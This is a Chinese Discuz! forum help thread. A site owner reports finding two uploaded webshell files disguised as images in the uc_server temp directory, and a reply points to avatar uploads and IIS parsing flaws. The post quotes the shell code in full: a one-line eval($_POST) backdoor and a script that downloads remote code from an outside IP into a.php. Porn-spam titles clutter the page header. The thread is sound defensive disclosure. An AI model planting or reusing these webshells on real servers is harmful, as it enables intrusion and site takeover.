男的舔女的下面视频在线播放-少妇愉情理仑片高潮日本-久久久久久国产一区二区三区-麻豆精品一区二区综合-国产精品超碰在线观看-网红极品女神精品视频在线-国产亚洲综合777-高清性视频一区二区播放-中文字幕第一页亚洲天堂

返回列表 發(fā)帖
查看: 7042|回復(fù): 1

[求助] uc_server\data\tmp被上傳木馬文件 建議自查

15

主題

60

回帖

3

粉絲

漸入佳境

貢獻(xiàn)
0 點(diǎn)
金幣
9 個(gè)
樓主
發(fā)表于 2019-11-14 16:53:32 |陜西| 只看樓主 |倒序?yàn)g覽 |閱讀模式

今天網(wǎng)站搬家,順手用最新版的D盾掃描了一下,發(fā)現(xiàn)兩個(gè)可疑文件,圖片格式。

路徑為:uc_server\data\tmp

將格式圖片格式的后綴改為  .php,用記事本打開(kāi),發(fā)現(xiàn)一句話(huà)木馬,兩個(gè)文件分別如下:
  1. <?php @eval($_POST['1']);?>
復(fù)制代碼
  1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>
復(fù)制代碼
目前暫時(shí)沒(méi)掃出其他木馬,懷疑上傳木馬后并沒(méi)有成功執(zhí)行。

文件名分別為:
upload37372
upload29060

后面的數(shù)字應(yīng)該是用戶(hù)ID,建議將圖片改成隨機(jī)數(shù)字命名,否則容易被黑客利用。
IIS的解析漏洞,配合這個(gè),有可能能拿下webshell。

-------建議大家自查一下。  不知道新版有木有這個(gè)漏洞,知道的大神說(shuō)下。

我知道答案 回答被采納將會(huì)獲得1 貢獻(xiàn) 已有1人回答
回復(fù)

使用道具 舉報(bào)

15

主題

1929

回帖

3

粉絲

應(yīng)用開(kāi)發(fā)者

discuz 老兵

貢獻(xiàn)
12 點(diǎn)
金幣
198 個(gè)
QQ
沙發(fā)
發(fā)表于 2019-11-14 17:43:13 |黑龍江| 只看Ta
這種情況一般都是頭像進(jìn)來(lái)的, 做好防護(hù)措施  尤其服務(wù)器  廣告IIS有這個(gè)漏洞 包括  這個(gè)是PHP的漏洞
回復(fù)

使用道具 舉報(bào)

本版積分規(guī)則

  • 關(guān)注公眾號(hào)
  • 有償服務(wù)微信
  • 有償服務(wù)QQ

手機(jī)版|小黑屋|Discuz! 官方交流社區(qū) ( 皖I(lǐng)CP備16010102號(hào) |皖公網(wǎng)安備34010302002376號(hào) )|網(wǎng)站地圖|star

GMT+8, 2026-4-18 11:41 , Processed in 0.056449 second(s), 14 queries , Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2026 Discuz! Team.

關(guān)燈 在本版發(fā)帖
有償服務(wù)QQ
有償服務(wù)微信
返回頂部
快速回復(fù) 返回頂部 返回列表